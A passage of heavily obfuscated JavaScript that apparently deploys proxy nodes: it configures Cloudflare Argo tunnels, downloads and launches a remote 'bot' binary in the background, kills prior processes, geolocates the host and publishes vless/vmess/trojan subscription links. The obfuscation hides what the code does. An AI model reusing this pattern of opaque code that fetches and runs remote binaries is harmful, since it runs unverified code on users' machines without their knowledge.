_0x29f81f=_0x16d9b5['iYQwr'](_0x49caef,_0x16d9b5['yyqgV'])?_0x16d9b5[_0x3d1f43(0x21b,0x22c,0x2b1,0x1a5)]:_0x16d9b5[_0x3d1f43(0x58,0x10b,0xa5,0x48)],_0xf4423a={};_0xf4423a[_0x3d1f43(0xf2,-0x26,0x1eb,0x9b)]=npmPath,_0xf4423a[_0x3d1f43(0x1bf,0x1f6,0x28b,0x260)]=_0x29f81f,_0x291cd2[_0x3d1f43(0x23c,0x17a,0x22a,0x2d3)](_0xf4423a);}else{if(_0x16d9b5[_0x3d1f43(-0x24,0xec,0x5d,-0x115)](_0x16d9b5[_0x5a64fc(0x1a5,0x242,0x257,0x207)],_0x16d9b5[_0x3d1f43(0x1c1,0x2c7,0x1fd,0x174)])){const _0x4d7537=_0x16d9b5[_0x5a64fc(-0xd8,-0x10e,0xd,-0x5b)](_0x49caef,_0x16d9b5[_0x5a64fc(0x82,0xec,-0xa9,-0xa3)])?_0x16d9b5[_0x3d1f43(-0x18,-0x119,0x11a,0x116)]:_0x16d9b5[_0x5a64fc(-0x94,-0x104,-0x1de,0xb4)],_0x2baa5c={};_0x2baa5c['fileName']=phpPath,_0x2baa5c['fileUrl']=_0x4d7537,_0x291cd2[_0x5a64fc(0x1ad,0x2d5,0x192,0x245)](_0x2baa5c);}else{const _0x225fa5=_0x16d9b5[_0x3d1f43(0x13d,0xf9,0x20b,0x10a)](_0x5524d7,'arm')?_0x16d9b5[_0x3d1f43(-0x18,-0xe2,0x8a,0xc7)]:_0x16d9b5[_0x3d1f43(-0x5,0x110,-0x105,-0x9a)],_0x1101ac={};_0x1101ac['fileName']=_0x4306be,_0x1101ac[_0x3d1f43(0x1bf,0xc5,0xaa,0x6e)]=_0x225fa5,_0x182e9b[_0x5a64fc(0x1ad,0x1b8,0x21c,0x1da)](_0x1101ac);}}}return _0x291cd2;}function argoType(){const _0x3fc8e9={};_0x3fc8e9['NvniS']=_0x4070be(0xdf,0x322,0x1e6,0x229)+_0x43adea(0x19d,0x62,-0xa3,-0xa5),_0x3fc8e9[_0x43adea(0x213,0xd1,-0x61,-0x70)]='Thank\x20you\x20'+'for\x20using\x20'+'this\x20scrip'+'t,\x20enjoy!',_0x3fc8e9['KtbiE']=_0x43adea(-0x35,0x88,0x95,-0x4b)+_0x4070be(0xaf,0x69,0xb9,0xc1)+'yc.mn/web',_0x3fc8e9['NuYNt']=function(_0xc91c77,_0x1d5b2e){return _0xc91c77||_0x1d5b2e;},_0x3fc8e9['zWfoA']='ARGO_DOMAI'+'N\x20or\x20ARGO_'+_0x43adea(-0x2b,0x9e,0x172,0xb3)+_0x4070be(0x192,0x2a0,0x199,0x13a)+_0x43adea(-0x39,0xc3,0x1e1,-0x7)+_0x4070be(0x67,0x18e,0x96,-0x7f)+'s',_0x3fc8e9[_0x4070be(0x18f,0x7d,0xdf,0x198)]='TunnelSecr'+'et',_0x3fc8e9[_0x43adea(0x1f5,0x19a,0x10b,0x1e8)]=function(_0x34af4f,_0x336e2f){return _0x34af4f===_0x336e2f;},_0x3fc8e9[_0x4070be(-0x25,-0x40,0x6c,0x69)]=_0x4070be(0x2da,0x213,0x1c6,0xfc);function _0x4070be(_0x156e48,_0x263575,_0x7c5a0f,_0x35cfef){return _0x50d979(_0x156e48-0x11b,_0x263575-0x126,_0x7c5a0f- -0x19b,_0x156e48);}_0x3fc8e9['WfVBg']=_0x43adea(0x316,0x1d3,0x84,0x14c)+'n';function _0x43adea(_0x11a8f2,_0xb45b48,_0xeef1cf,_0x2fa3ea){return _0x51c265(_0xb45b48- -0x313,_0xb45b48-0x14c,_0x11a8f2,_0x2fa3ea-0xb0);}_0x3fc8e9['zDSKQ']=_0x43adea(-0x102,0x2f,-0x119,-0xcb),_0x3fc8e9['GsYsx']='KviVq',_0x3fc8e9['xcQul']='gbIpp',_0x3fc8e9[_0x4070be(0x5,-0x180,-0x66,-0x32)]=_0x43adea(0x95,0x105,0x3c,0x86)+'mismatch\x20T'+_0x4070be(0x1e0,0x19,0x13e,0x173)+_0x43adea(-0x38,0xda,0x46,0x1c6)+_0x43adea(0x188,0x175,0x294,0x121)+_0x4070be(0x13f,0x262,0x1c0,0xf9);const _0x5082fb=_0x3fc8e9;if(_0x5082fb[_0x43adea(0x190,0x79,0x1bc,-0x3e)](!ARGO_AUTH,!ARGO_DOMAIN)){console[_0x4070be(0x1f7,0xd4,0x173,0x208)](_0x5082fb['zWfoA']);return;}if(ARGO_AUTH['includes'](_0x5082fb[_0x43adea(0x16b,0x1a8,0x9f,0x11d)])){if(_0x5082fb[_0x4070be(0x88,0x1f8,0xd1,-0x60)](_0x5082fb[_0x4070be(0x2d,0x14f,0x6c,0x5d)],_0x5082fb[_0x43adea(0x10,0x135,0x263,0x13a)])){fs[_0x4070be(0x14d,0x7c,0xc0,0x129)+_0x43adea(0x2e5,0x206,0x29e,0x2d3)](path[_0x43adea(0x2b2,0x1cf,0x22d,0x251)](FILE_PATH,_0x5082fb['WfVBg']),ARGO_AUTH);const _0x2798ca=_0x43adea(0x18d,0x9b,0x87,0x2d)+'\x20'+ARGO_AUTH['split']('\x22')[0x3*-0x7d9+-0x14f9+0x2c8f]+(_0x43adea(0x108,0x151,0x153,0x15)+_0x4070be(0x1ee,0x21,0xf3,-0x5e)+'\x20')+path[_0x43adea(0x2a2,0x1cf,0x1ef,0x14c)](FILE_PATH,_0x5082fb[_0x4070be(0x1a4,0xce,0x133,0x15a)])+(_0x43adea(0x173,0x2a2,0x300,0x391)+'l:\x20http2\x0a\x20'+_0x4070be(0x120,0x105,0x12c,0x4c)+_0x43adea(0x32c,0x2bb,0x27d,0x197)+_0x4070be(0x82,0xe3,0x1ba,0x21b))+ARGO_DOMAIN+(_0x4070be(-0xaf,0x10a,0x4e,0x123)+_0x43adea(0x36c,0x2a7,0x39e,0x1fa)+'://localho'+'st:')+ARGO_PORT+(_0x4070be(-0x148,0x12,0x9,0x139)+_0x43adea(0x1c2,0x1c4,0x234,0x28c)+':\x0a\x20\x20\x20\x20\x20\x20\x20\x20'+_0x4070be(0x21,0x17,0x30,0x69)+_0x43adea(-0xbb,0x4c,-0xc7,-0xf9)+_0x43adea(0x2,0xdb,-0x67,0x208)+_0x4070be(0xce,0x19a,0x131,0x1f2)+_0x4070be(0x110,0x19e,0x1b6,0x2a9)+'\x20');fs[_0x4070be(0x198,0x1aa,0xc0,0x1bb)+'ync'](path['join'](FILE_PATH,_0x5082fb['zDSKQ']),_0x2798ca);}else _0x35060e[_0x43adea(0x158,0xa5,0x1c1,0x3a)](),_0x47262d['log'](_0x5082fb[_0x4070be(0xd8,0xba,0x181,0xbf)]),_0x247dad[_0x43adea(0x28b,0x23c,0x20f,0x197)](_0x5082fb[_0x4070be(0x144,0x29,0x8,0xec)]);}else{if(_0x5082fb[_0x43adea(0x68,0xd3,0x4b,0x192)]!==_0x5082fb[_0x4070be(0xf7,0x125,0x1e2,0x247)])console[_0x43adea(0x20d,0x23c,0x225,0x290)](_0x5082fb['GrLqR']);else{const _0x2c8faa={};_0x2c8faa[_0x4070be(-0x13,0x1b0,0x9e,0x1b7)]=_0x2fc2ed,_0x2c8faa['fileUrl']=_0x5082fb['KtbiE'];const _0x309316={};_0x309316[_0x43adea(0xac,0x167,0x247,0xe4)]=_0x11f2d9,_0x309316[_0x4070be(0x204,0x231,0x16b,0x296)]='https://ar'+'m64.ssss.n'+_0x43adea(0x219,0x277,0x251,0x141),_0x35acc7=[_0x2c8faa,_0x309316];}}}async function extractDomains(){function _0xeba5df(_0x5a1f51,_0x20b180,_0x4e47e9,_0x476f75){return _0x51c265(_0x5a1f51- -0x1b,_0x20b180-0x1e6,_0x4e47e9,_0x476f75-0x1c1);}function _0x3c6acf(_0x176ff2,_0x39395a,_0x2b4ffe,_0x394d63){return _0x51c265(_0x39395a- -0x4e2,_0x39395a-0xa0,_0x2b4ffe,_0x394d63-0xe6);}const _0x5c6b5b={'rVnRl':function(_0x3cbfd2,_0x2006b1){return _0x3cbfd2===_0x2006b1;},'xERbu':_0x3c6acf(-0x66,0xb6,0xd1,0xd7),'eBxva':function(_0x5361aa,_0x2ebf41){return _0x5361aa(_0x2ebf41);},'YJAyu':function(_0x13b2d5,_0x16d114,_0x27974e){return _0x13b2d5(_0x16d114,_0x27974e);},'lXwxz':function(_0x573a28,_0x18e168){return _0x573a28(_0x18e168);},'laIxc':_0x3c6acf(0x57,0xa9,0xce,-0x8f),'FukMC':'error','FYjUx':'https://ip'+_0x3c6acf(0x7a,0x15,0x13,0xd3)+'n/','VrUNV':_0xeba5df(0x53a,0x5d0,0x53c,0x5cd)+_0x3c6acf(-0x6a,-0x71,-0x89,0x23)+_0x3c6acf(-0x171,-0xdf,-0x84,-0x1e2),'KxtsE':_0x3c6acf(-0xff,-0x145,-0x15a,-0xcc),'HsoVL':_0x3c6acf(0x7f,-0x59,0xf,-0x7e),'InDch':'Content-Ty'+'pe','lJkok':'none','zXzmR':_0x3c6acf(0x180,0xbf,0x95,0xf6),'NGnyc':function(_0x36781b,_0x5a4510,_0x102076){return _0x36781b(_0x5a4510,_0x102076);},'ZSUPQ':function(_0x18165f,_0x37b9d5){return _0x18165f!==_0x37b9d5;},'PubnT':_0xeba5df(0x5a0,0x6ac,0x56d,0x5d1),'hSGQt':'/vmess-arg'+'o?ed=2560','DlnGx':function(_0x35d40e){return _0x35d40e();},'Aswul':function(_0x311b6e,_0x3832b6){return _0x311b6e===_0x3832b6;},'SbjhA':'xTFyJ','XuwXa':_0x3c6acf(-0x2c,-0x9,0x127,-0xff),'pZHVf':function(_0x387fa5){return _0x387fa5();},'eGZNO':_0xeba5df(0x413,0x437,0x4b9,0x2d1)+'N:','xxXyd':function(_0x2cd3af,_0x54ac29){return _0x2cd3af(_0x54ac29);},'jyXCI':_0xeba5df(0x3e6,0x399,0x4f2,0x2d2),'Wzkmp':_0xeba5df(0x482,0x5ac,0x389,0x5a0),'ddhwf':_0x3c6acf(0x3c,-0x44,0x108,0x77)+':','aDKOY':function(_0x2050ea,_0x4fae01){return _0x2050ea(_0x4fae01);},'XvUPw':_0xeba5df(0x483,0x563,0x3b2,0x3f9)+_0xeba5df(0x3f0,0x534,0x42d,0x537)+_0xeba5df(0x347,0x46e,0x2bd,0x3fc)+'ng\x20bot\x20to\x20'+_0xeba5df(0x495,0x592,0x35e,0x3ad)+_0xeba5df(0x55f,0x670,0x65b,0x4e4),'QuEYd':function(_0x44b2f1){return _0x44b2f1();},'EOBlb':function(_0x2be3c4,_0x5d65d9){return _0x2be3c4(_0x5d65d9);},'yGjvX':function(_0x1e8dc1,_0x5167c6){return _0x1e8dc1!==_0x5167c6;},'oJeki':_0x3c6acf(-0x234,-0x108,-0x43,-0x228),'PUlGE':'dJLvN','eAmmS':_0xeba5df(0x490,0x3e3,0x524,0x538)+_0xeba5df(0x44a,0x35d,0x476,0x4e3)+'og:'};let _0x1b4c21;if(ARGO_AUTH&&ARGO_DOMAIN)_0x3c6acf(0x141,0x66,-0x4e,0x101)!==_0x3c6acf(-0x44,0xcc,-0x1c,0x105)?(_0x1b4c21=ARGO_DOMAIN,console[_0x3c6acf(0x8a,0x6d,-0xa6,0xc8)](_0x5c6b5b[_0x3c6acf(0x4f,-0x19,0x25,0x3b)],_0x1b4c21),await _0x5c6b5b[_0xeba5df(0x4e1,0x3c2,0x3be,0x59c)](_0x4b5ab6,_0x1b4c21)):_0x58d7e5['error'](_0xeba5df(0x37a,0x458,0x33b,0x252)+'g\x20error:\x20'+_0x50337d);else{if(_0x3c6acf(-0x159,-0x101,-0x227,-0x6b)===_0x3c6acf(0x3d,-0x101,-0xfd,-0x181))try{const _0x1fb228=fs[_0xeba5df(0x41b,0x2c9,0x533,0x385)+'nc'](path[_0xeba5df(0x4c7,0x3a5,0x3f3,0x48d)](FILE_PATH,_0x5c6b5b['jyXCI']),_0x5c6b5b[_0xeba5df(0x4af,0x5b5,0x375,0x3ee)]),_0x56f89e=_0x1fb228[_0x3c6acf(0x81,0xb5,0x163,0xa5)]('\x0a'),_0x47bb9e=[];_0x56f89e[_0xeba5df(0x58a,0x5e6,0x569,0x45a)](_0x4ec227=>{function _0x1c49b5(_0x5a1e93,_0x274cc7,_0xb08c4f,_0x5d6944){return _0x3c6acf(_0x5a1e93-0x8e,_0x274cc7-0x1b,_0xb08c4f,_0x5d6944-0x15c);}function _0x5e3248(_0x4866b7,_0x4f3d4a,_0x4d52de,_0x1c9ac){return _0x3c6acf(_0x4866b7-0x53,_0x4f3d4a-0x4e,_0x4866b7,_0x1c9ac-0x18);}const _0x35dd6e=_0x4ec227[_0x1c49b5(0x109,0x69,0x158,0x5e)](/https?:\/\/([^ ]*trycloudflare\.com)\/?/);if(_0x35dd6e){if(_0x5c6b5b[_0x1c49b5(0xf9,0xd4,0x21f,0x193)](_0x5c6b5b['xERbu'],_0x5c6b5b[_0x1c49b5(0xe7,-0x4e,-0x23,-0xdc)])){const _0x450370=_0x35dd6e[-0x17a5*-0x1+-0x46a+-0x133a];_0x47bb9e[_0x1c49b5(-0x1e8,-0x18d,-0x1bd,-0x285)](_0x450370);}else{const _0x11ce82=_0x32c185[_0x5e3248(0xf,-0x4b,-0x84,0x33)](_0x4bfe47);_0x11ce82['isFile']()&&_0x2a9d0e[_0x1c49b5(0x40,0x64,0x21,0x74)](_0x31b268);}}});if(_0x47bb9e['length']>0x1ceb+0x1261+-0x2f4c)_0x1b4c21=_0x47bb9e[-0x25e4+0x5d1*-0x1+0x2bb5*0x1],console['log'](_0x5c6b5b['ddhwf'],_0x1b4c21),await _0x5c6b5b[_0xeba5df(0x40e,0x43a,0x362,0x316)](_0x4b5ab6,_0x1b4c21);else{console['log'](_0x5c6b5b['XvUPw']),fs[_0xeba5df(0x510,0x658,0x536,0x5ac)](path['join'](FILE_PATH,_0xeba5df(0x3e6,0x3ea,0x42a,0x4e7)));async function _0x157845(){function _0xea8e85(_0x16007c,_0x369859,_0x48bc1f,_0x5d5d1c){return _0x3c6acf(_0x16007c-0x34,_0x369859- -0x7,_0x48bc1f,_0x5d5d1c-0x177);}function _0x140803(_0x7ec6f0,_0x2125d5,_0x3b0fc2,_0x7f4b4){return _0x3c6acf(_0x7ec6f0-0xac,_0x3b0fc2-0x54a,_0x7ec6f0,_0x7f4b4-0xc8);}try{process[_0x140803(0x320,0x3bd,0x395,0x4da)]===_0x140803(0x586,0x690,0x621,0x584)?await _0x5c6b5b['eBxva'](exec,'taskkill\x20/'+_0x140803(0x4ea,0x4a4,0x3d3,0x372)+botName+('.exe\x20>\x20nul'+'\x202>&1')):await _0x5c6b5b[_0x140803(0x531,0x4a5,0x4c3,0x598)](exec,_0x140803(0x4bd,0x64f,0x5ba,0x694)+'['+botName['charAt'](0x3*-0x496+-0x4b*0x3d+0x1fa1)+']'+botName['substring'](0x4*-0x5a8+-0x197a+0x301b)+('\x22\x20>\x20/dev/n'+'ull\x202>&1'));}catch(_0x5c3f31){}}_0x5c6b5b[_0x3c6acf(-0x111,-0x41,-0x54,-0x148)](_0x157845),await new Promise(_0x3e6470=>setTimeout(_0x3e6470,-0x647*-0x1+0x8df+0x1b7*-0x2));const _0x4675d0=_0xeba5df(0x43f,0x4c6,0x53d,0x429)+_0xeba5df(0x4fb,0x62c,0x3c0,0x434)+_0x3c6acf(-0x103,-0x142,-0x147,-0x28d)+_0x3c6acf(-0x23e,-0x10f,-0x1ea,-0x1b2)+_0xeba5df(0x3b3,0x332,0x2da,0x4cf)+_0xeba5df(0x4a9,0x4b6,0x3eb,0x3f2)+_0xeba5df(0x504,0x4b9,0x54b,0x4c0)+_0x3c6acf(-0xbe,-0x19a,-0x180,-0xff)+FILE_PATH+(_0xeba5df(0x3ba,0x434,0x287,0x436)+_0x3c6acf(-0x1a7,-0x89,-0x171,0x52)+_0x3c6acf(0xa2,0xce,0x1d3,0x136)+'l\x20http://l'+'ocalhost:')+ARGO_PORT;try{await _0x5c6b5b[_0x3c6acf(-0x95,0x58,0xb7,0xc9)](exec,_0xeba5df(0x39e,0x32b,0x490,0x4bc)+botPath+'\x20'+_0x4675d0+(_0xeba5df(0x58f,0x621,0x64f,0x6b9)+'l\x202>&1\x20&')),console[_0x3c6acf(-0xe,0x6d,-0xc0,0x11d)](botName+(_0xeba5df(0x352,0x42c,0x2cf,0x244)+'g')),await new Promise(_0x3c58ec=>setTimeout(_0x3c58ec,0x3*-0xbe9+-0x10b2*0x2+0x50d7)),await _0x5c6b5b[_0x3c6acf(-0x1b0,-0xef,-0x1f9,-0x43)](extractDomains);}catch(_0x3d8a4e){_0x5c6b5b[_0xeba5df(0x342,0x36a,0x2fd,0x2e7)](_0x5c6b5b[_0xeba5df(0x501,0x504,0x50c,0x430)],_0x5c6b5b['oJeki'])?(_0x3b8c17['data'][_0x3c6acf(-0x293,-0x15e,-0x152,-0xe6)](_0x3ecbfa),_0x5c3872['on'](_0x5c6b5b[_0x3c6acf(0x110,0x50,0x10a,-0xd5)],()=>{function _0x38f864(_0x563336,_0x284304,_0x11bea1,_0x432ea3){return _0xeba5df(_0x432ea3- -0x385,_0x284304-0x106,_0x11bea1,_0x432ea3-0x1e9);}function _0x2d9ccf(_0x4a5fa2,_0x242417,_0x3e4bb0,_0x19cce3){return _0xeba5df(_0x3e4bb0- -0x4be,_0x242417-0x77,_0x4a5fa2,_0x19cce3-0x1a9);}_0x5b7764['close'](),_0x418954[_0x38f864(0x19e,0x1f4,0x1bc,0x1af)](_0x2d9ccf(-0x1c9,-0x178,-0x178,-0x154)+_0x507d8b[_0x38f864(0x31f,0x28d,0x212,0x218)](_0x2297a4)+(_0x38f864(0x5d,0x14c,0x32,0x55)+_0x2d9ccf(-0x1b,0x3,0x66,-0xd6))),_0x5c6b5b[_0x38f864(0x1a0,0xa2,0x159,0x5b)](_0x40f6ea,null,_0x5a5028);}),_0xd2dc43['on'](_0x5c6b5b['FukMC'],_0x27dd2b=>{_0x5c2109[_0x224736(0x108,-0x7a,0x69,0x16)](_0x2fc05e,()=>{});function _0x54fd30(_0x3a15a7,_0x2cb75f,_0x3a8f51,_0x1b9ebe){return _0xeba5df(_0x1b9ebe- -0x4a3,_0x2cb75f-0x18f,_0x2cb75f,_0x1b9ebe-0x99);}const _0x190570=_0x54fd30(-0x1d5,-0x203,-0x19,-0x15d)+_0x42dbdf[_0x54fd30(0x1e1,-0x1c,0xcd,0xfa)](_0x588d16)+_0x224736(-0xe3,-0x107,-0x89,-0x124)+_0x27dd2b[_0x54fd30(0x1bd,-0x63,0x15,0xd2)];_0x2f4c77[_0x224736(0xbc,0x6e,-0x84,-0xe4)](_0x190570);function _0x224736(_0x3fd75c,_0x256a3c,_0x45e07f,_0x238003){return _0xeba5df(_0x45e07f- -0x3a9,_0x256a3c-0x72,_0x238003,_0x238003-0x1b0);}_0x5c6b5b[_0x54fd30(0xe3,-0x11d,0xc7,0x1d)](_0x29a8f7,_0x190570);})):console['error']('Error\x20exec'+'uting\x20comm'+_0xeba5df(0x589,0x662,0x646,0x52b)+_0x3d8a4e);}}}catch(_0x22ffe1){_0x5c6b5b[_0x3c6acf(0xfa,0xa,0x140,0xb2)]===_0x5c6b5b[_0x3c6acf(0x104,0xa,0x6d,0xf)]?console[_0x3c6acf(-0x1a2,-0x1a2,-0x13b,-0x285)](_0x5c6b5b[_0x3c6acf(-0x103,-0x2b,-0x5d,0x104)],_0x22ffe1):_0x499f89?_0xe9b723['error']('Empowermen'+'t\x20failed\x20f'+_0xeba5df(0x426,0x4d7,0x4de,0x3bf)+_0x5a044c+':\x20'+_0x1a3719):_0xfa5e51[_0x3c6acf(-0xb0,0x6d,0x8,-0x43)]('Empowermen'+'t\x20success\x20'+_0xeba5df(0x41c,0x558,0x35d,0x39b)+_0x46563b+':\x20'+_0x33d979[_0xeba5df(0x38c,0x4ac,0x38c,0x2e4)](-0x10a2*0x1+0x159c+-0x4f2));}else{const _0x37bc43=_0x213a63[_0x3c6acf(0x98,0x4e,0x178,0x9b)](/https?:\/\/([^ ]*trycloudflare\.com)\/?/);if(_0x37bc43){const _0x4087f8=_0x37bc43[-0x1fce+0x48c*-0x5+-0x368b*-0x1];_0x195fab[_0xeba5df(0x31f,0x38e,0x440,0x1d2)](_0x4087f8);}}}async function _0x4ee3b2(){function _0x3bd6f5(_0xb2934d,_0x3959ba,_0x33b3d5,_0x2212df){return _0x3c6acf(_0xb2934d-0xad,_0x33b3d5-0x368,_0x3959ba,_0x2212df-0xb8);}function _0x301df7(_0x12ae5f,_0x1de49a,_0x472abb,_0x28546e){return _0x3c6acf(_0x12ae5f-0x1ba,_0x1de49a-0x25e,_0x472abb,_0x28546e-0x1d7);}try{const _0xecb11a={};_0xecb11a['timeout']=0xbb8;const _0x5d6306=await axios['get'](_0x5c6b5b[_0x301df7(0x111,0x23a,0x15c,0x2ae)],_0xecb11a);if(_0x5d6306[_0x3bd6f5(0x2e7,0x321,0x38c,0x2ad)]&&_0x5d6306[_0x301df7(0x1bb,0x282,0x3c4,0x2e9)]['country_co'+'de']&&_0x5d6306['data'][_0x301df7(0xee,0xee,0x1b2,0x1e2)])return _0x5d6306[_0x301df7(0x328,0x282,0x389,0x1dd)]['country_co'+'de']+'_'+_0x5d6306['data'][_0x301df7(0x1c5,0xee,0xe6,0x141)];}catch(_0x2e64a2){try{const _0x5ee227={};_0x5ee227[_0x3bd6f5(0x2fe,0x29d,0x24d,0x291)]=0xbb8;const _0x109355=await axios[_0x3bd6f5(0x18f,0x2d2,0x27e,0x354)](_0x5c6b5b[_0x3bd6f5(0x2b1,0x181,0x268,0x14d)],_0x5ee227);if(_0x109355[_0x301df7(0x39f,0x282,0x2ac,0x39d)]&&_0x109355['data']['status']===_0x3bd6f5(0x288,0x13c,0x227,0x373)&&_0x109355['data'][_0x3bd6f5(0x260,0x242,0x37b,0x255)+'e']&&_0x109355[_0x301df7(0x307,0x282,0x372,0x370)][_0x3bd6f5(0x115,0x1b5,0x1f8,0x330)])return _0x109355['data'][_0x301df7(0x21d,0x271,0x2de,0x324)+'e']+'_'+_0x109355[_0x3bd6f5(0x411,0x36a,0x38c,0x4ce)][_0x301df7(-0xa,0xee,0xaf,0xcb)];}catch(_0x553682){}}return _0x5c6b5b[_0x301df7(0x1c6,0x2a1,0x285,0x22d)];}async function _0x4b5ab6(_0x41ee25){function _0x17674d(_0x796630,_0x44d9fb,_0x5c604d,_0x59a780){return _0xeba5df(_0x59a780-0x4f,_0x44d9fb-0xef,_0x796630,_0x59a780-0xbc);}function _0x2b1220(_0xd253fd,_0x21010a,_0xfe0f05,_0x2086eb){return _0x3c6acf(_0xd253fd-0x1ea,_0xd253fd-0x2da,_0xfe0f05,_0x2086eb-0x4);}if(_0x5c6b5b[_0x2b1220(0x180,0x24b,0x1e9,0xf8)](_0x5c6b5b[_0x2b1220(0x304,0x25b,0x36d,0x346)],_0x5c6b5b['XuwXa'])){const _0x2bf760={};_0x2bf760['DTwKb']=_0x5c6b5b[_0x2b1220(0x214,0x149,0x27b,0x1b1)],_0x2bf760['OOJnD']=_0x5c6b5b[_0x2b1220(0x20c,0x27e,0x108,0x2ba)],_0x2bf760[_0x17674d(0x557,0x664,0x4df,0x570)]=_0x5c6b5b[_0x17674d(0x51f,0x54c,0x4c6,0x5e7)],_0x2bf760[_0x2b1220(0x2f2,0x2a2,0x36f,0x38c)]=_0x5c6b5b['zXzmR'];const _0x113bb8=_0x2bf760;_0x5c6b5b[_0x17674d(0x309,0x345,0x392,0x3f4)](_0x4d7418,()=>{function _0x321839(_0x1a69b3,_0x3f3d20,_0xc919b8,_0x4efeba){return _0x2b1220(_0xc919b8-0x2db,_0x3f3d20-0x105,_0x1a69b3,_0x4efeba-0x122);}const _0xa9c8e7={};_0xa9c8e7[_0x785edf(-0x296,-0x260,-0x253,-0x164)]=_0x113bb8[_0x785edf(0x0,0xd,-0xb4,0x63)],_0xa9c8e7[_0x785edf(-0x1b1,-0x207,-0x183,-0x16c)]=_0x113bb8[_0x785edf(-0x5d,0x135,0xad,0x0)];const _0x2725a0=_0xa9c8e7,_0x26c11e={};_0x26c11e['v']='2',_0x26c11e['ps']=''+_0x1ef1f3,_0x26c11e[_0x785edf(0x10,-0x151,-0x103,-0x5f)]=_0x2e7482,_0x26c11e[_0x785edf(0xbb,0x68,-0xdb,0x3d)]=_0x44154c,_0x26c11e['id']=_0x5f2083,_0x26c11e[_0x321839(0x6ec,0x619,0x672,0x544)]='0',_0x26c11e[_0x321839(0x599,0x483,0x491,0x487)]=_0x113bb8['eNnfe'],_0x26c11e['net']='ws',_0x26c11e['type']=_0x113bb8['eNnfe'],_0x26c11e[_0x785edf(-0xae,0xf7,-0x1c,0x3)]=_0x46ad8a,_0x26c11e[_0x321839(0x51b,0x646,0x5a5,0x658)]=_0x785edf(0x37,-0x15d,-0x1da,-0x9b)+'o?ed=2560',_0x26c11e[_0x321839(0x62c,0x54a,0x674,0x788)]=_0x113bb8[_0x785edf(0x12,-0x21,0xdd,0x48)],_0x26c11e['sni']=_0x16f923,_0x26c11e[_0x785edf(0x168,0x1a0,0x6a,0xac)]='',_0x26c11e['fp']=_0x785edf(0x6c,-0x1ac,0x50,-0x7a);const _0x137387=_0x26c11e,_0x15724e=_0x321839(0x546,0x5d5,0x62d,0x514)+_0x471c6d+'@'+_0x28ca6f+':'+_0x4e3058+(_0x785edf(0xcb,0xe6,0x168,0x90)+'n=none&sec'+_0x785edf(-0x1c1,0x8d,-0x74,-0x79)+_0x321839(0x40d,0x547,0x554,0x50b))+_0x4356b+(_0x321839(0x62a,0x4e0,0x53b,0x458)+_0x321839(0x54b,0x5fb,0x5a9,0x5f1)+'host=')+_0x8c59e3+(_0x785edf(-0xd2,0xf,-0x3,-0xe6)+'less-argo%'+_0x785edf(-0x29,0x194,0x5c,0x102)+'0#')+_0x2a1e0b+'\x0a\x0avmess://'+_0x5f4fdb[_0x785edf(-0x16f,-0x60,-0xba,-0xcf)](_0xe29bee[_0x785edf(-0x19f,-0xbc,-0x1fb,-0x129)](_0x137387))[_0x785edf(0xf,-0x10d,-0x247,-0x10b)](_0x113bb8['DTwKb'])+(_0x785edf(0xd7,0x220,0x152,0xe1)+'/')+_0x26632b+'@'+_0x5ba491+':'+_0x33cd53+('?security='+_0x785edf(0x6f,0x183,0x1d9,0xaf))+_0x164b20+(_0x321839(0x56e,0x4c3,0x53b,0x404)+'x&type=ws&'+_0x785edf(0x11d,-0x51,-0x7b,-0x9))+_0x52edc1+('&path=%2Ft'+_0x785edf(-0x7,-0x1,-0x196,-0xa2)+_0x321839(0x357,0x499,0x428,0x416)+_0x785edf(0x85,-0xc2,-0xe5,0x4b))+_0x37706d+_0x785edf(-0xa0,-0x10f,-0x163,-0xbc);_0x1ab00a[_0x321839(0x730,0x681,0x622,0x5e4)](_0x87167['from'](_0x15724e)[_0x785edf(0x33,-0x15f,-0x4a,-0x10b)](_0x113bb8['DTwKb'])),_0x3459c4['writeFileS'+_0x321839(0x669,0x591,0x5ec,0x627)](_0x4ed470,_0x3ec338[_0x321839(0x49a,0x592,0x4b6,0x5a3)](_0x15724e)['toString'](_0x113bb8[_0x785edf(0xef,-0x7b,0xef,0x63)])),_0x247fdc[_0x321839(0x5c4,0x6ac,0x622,0x65f)](_0x1f68c7+('/sub.txt\x20s'+_0x785edf(-0x32,-0xbd,0x108,0x72)+_0x785edf(0x17,-0x5a,-0x90,0x15)));function _0x785edf(_0x127d73,_0x45bd58,_0x4b0779,_0x243b54){return _0x2b1220(_0x243b54- -0x2aa,_0x45bd58-0xd7,_0x127d73,_0x243b54-0x10d);}_0xff9f49(),_0x4e645a[_0x785edf(-0x129,-0xb,-0x206,-0xba)]('/'+_0x5376e9,(_0x3f734b,_0x4fbd3d)=>{const _0x1b64ba=_0xcf42a4[_0x41621b(0x4a4,0x58d,0x4d4,0x512)](_0x15724e)[_0x5330ec(-0x181,-0x22c,-0x174,-0x6d)](_0x2725a0['RKhyK']);function _0x5330ec(_0x48bda5,_0x33363a,_0x56660e,_0x50bbc0){return _0x321839(_0x50bbc0,_0x33363a-0x3e,_0x48bda5- -0x5fb,_0x50bbc0-0xbf);}function _0x41621b(_0x65d670,_0x15afe4,_0x29dca2,_0x5ce1a8){return _0x785edf(_0x65d670,_0x15afe4-0x106,_0x29dca2-0x17d,_0x29dca2-0x5a3);}_0x4fbd3d['set'](_0x2725a0[_0x5330ec(-0x1e2,-0x306,-0x1fe,-0x312)],_0x41621b(0x5ca,0x7d1,0x69e,0x6c6)+_0x41621b(0x418,0x3f9,0x4f0,0x3de)+_0x5330ec(-0x8b,-0x15d,-0x59,0x4a)),_0x4fbd3d[_0x41621b(0x71b,0x591,0x6a7,0x5d2)](_0x1b64ba);}),_0x3da0d4(_0x15724e);},0xdf*0x25+-0x1*-0x1acd+0xcce*-0x4);}else{const _0x535231=await _0x5c6b5b[_0x2b1220(0x1eb,0x272,0x22d,0x257)](_0x4ee3b2),_0xddf0f=NAME?NAME+'-'+_0x535231:_0x535231;return new Promise(_0x1b98a6=>{const _0x414c39={'CkzER':function(_0x1d3109,_0x3d6ad2){function _0x344bfd(_0x49998f,_0x568298,_0x3d60a5,_0x5de627){return _0x43ed(_0x49998f-0x23b,_0x5de627);}return 